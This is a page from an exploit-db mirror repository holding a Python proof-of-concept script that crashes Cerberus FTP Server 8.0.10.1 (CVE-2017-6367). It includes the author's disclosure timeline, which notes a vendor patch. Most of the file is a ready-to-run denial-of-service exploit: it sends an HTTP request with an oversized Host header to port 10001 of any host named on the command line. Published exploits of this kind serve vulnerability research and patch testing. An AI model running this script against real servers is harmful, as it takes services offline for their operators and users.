bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/41596.py
Offensive Security 8359f0a6a2 DB: 2017-03-14 
5 new exploits

Cerberus FTP Server  8.0.10.1 - Denial of Service

VirtualBox - Cooperating VMs can Escape from Shared Folder

Netgear R7000 and R6400 - cgi-bin Command Injection (Metasploit)

Car Workshop System - SQL Injection

Fiyo CMS 2.0.6.1 - Privilege Escalation
2017-03-14 05:01:18 +00:00

46 lines
1.6 KiB
Python
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Cerberus FTP server Denial of Service
# Date: 2017-03-13
# Exploit Author: Peter Baris
# Vendor Homepage: https://www.cerberusftp.com/
# Software Link: [download link if available]
# Version: 8.0.10.1
# Tested on: Windows Server 2008 R2 Standard x64, Windows 7 Pro SP1 x64
# CVE : CVE-2017-6367
# 2017-02-27: Vulnerability discovered, Contact to Cerberus Support
# 2017-02-27: Reply received, PoC exploit code sent
# 2017-02-27: Problematic module identified by the vendor, gSOAP
# 2017-03-02: New version 8.0.10.2 released - https://www.cerberusftp.com/products/releasenotes/
# 2017-03-02: gSOAP module update released by the vendor and advisory placed https://www.genivia.com/advisory.html
# 2017-03-02: grace period until 13th March
# 2017-03-13: Publishing
import socket
import sys
try:
host = sys.argv[1]
port = 10001
except IndexError:
print "[+] Usage %s <host> " % sys.argv[0]
sys.exit()
exploit = "A"*5004
buffer = "GET /index.html HTTP/1.1\r\n"
buffer+= "Host: "+exploit+host+":"+str(port)+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: "+host+":"+str(port)+"\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()
Reference in a new issue View git blame Copy permalink